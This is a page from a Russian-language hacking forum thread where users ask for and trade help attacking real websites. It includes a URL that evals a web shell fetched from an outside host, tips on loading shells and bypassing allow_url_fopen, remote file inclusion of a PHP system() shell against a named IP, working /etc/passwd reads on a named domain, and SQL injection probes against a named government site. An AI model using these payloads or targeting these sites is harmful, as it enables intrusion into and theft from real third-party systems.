HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1538 из 2422 « Первая < 5381038143814881528 1534 1535 1536 1537 1538 1539 1540 1541 1542 1548158816382038 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.11.2010, 14:37
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
Цитата:
Сообщение от noviyuser  
подскажите код, могу создавать страницы на сайте
выполняется команда показа информации о php
как сделать так чтобы можно было залить на сервер файл с другого сайта?
на большой код разных шеллов ругается
Parse error: syntax error, unexpected '>' in с:\xxx\www\includes\common.inc(1695) : eval()'d code on line 1
пробовал так тоже не получается
site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
 
Ответить с цитированием

  #2  
Старый 24.11.2010, 16:51
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от Gorev  

site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
Дополнение: в textshell.txt шелл должен лежать без дескрипторов в начале и конце.
 
Ответить с цитированием

  #3  
Старый 24.11.2010, 17:19
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
Цитата:
Сообщение от Gorev  

site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
Дополнение:Это при allow_url_fopen = on
 
Ответить с цитированием

  #4  
Старый 24.11.2010, 17:49
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
Цитата:
Сообщение от ~d0s~  
Дополнение:Это при allow_url_fopen = on
есть обход и этого дела
 
Ответить с цитированием

  #5  
Старый 24.11.2010, 19:19
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855

Репутация: 0
По умолчанию
Делаю так:

http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls -la

и так

http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls

выводит текст файла, т.е.

'; system($_GET['c']); echo ''; }exit; ?>

Как можно заюзать?
 
Ответить с цитированием

  #6  
Старый 24.11.2010, 19:25
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию
Нет это простой IFRAME.
 
Ответить с цитированием

  #7  
Старый 24.11.2010, 19:26
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию
Цитата:
Сообщение от ALIM  
Делаю так:
http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls -la
и так
http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls
выводит текст файла, т.е.
'; system($_GET['c']); echo ''; }exit; ?>
Как можно заюзать?
ALIM

1. это не инклуд, просто файл открывается в фрейме

2. там используется технология ASP, а ты прикрепляеш пхп файл и хочеш интерпретировать )

и 3. если ASP то там 99% винда, а ты экзекаеш команду юникс ))
 
Ответить с цитированием

  #8  
Старый 24.11.2010, 19:30
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855

Репутация: 0
По умолчанию
Konqi

а тут, вроде пхп?

http://www.echoeshub.com/recordings/ew.php?fname=http://xxx.narod.ru/1.txt
 
Ответить с цитированием

  #9  
Старый 24.11.2010, 19:56
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
ALIM

Файлы читает

http://www.echoeshub.com/recordings/ew.php?fname=/etc/passwd

http://www.echoeshub.com/recordings/ew.php?fname=index.php

http://www.echoeshub.com/recordings/ew.php?fname=jumphere.css
 
Ответить с цитированием

  #10  
Старый 26.11.2010, 14:44
h3xf0x
Новичок
Регистрация: 25.11.2010
Сообщений: 3
Провел на форуме:
1179

Репутация: 0
По умолчанию
Всем привет.

Подобрал количество полей. Как я понял вывод одного поля.

http://imperial.ca.gov/dept.php?id=-1+order+by+1

Но если попытаться вывести поле пишет ошибку - different number of columns

http://imperial.ca.gov/dept.php?id=-1+union+select+1

т.е. возможно, что здесь 3 версия MySQL?

Как нибудь инфу можно вытащить?

Или где почитать про это можно? Спасибо.
 
Ответить с цитированием
Ответ
Страница 1538 из 2422 « Первая < 5381038143814881528 1534 1535 1536 1537 1538 1539 1540 1541 1542 1548158816382038 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.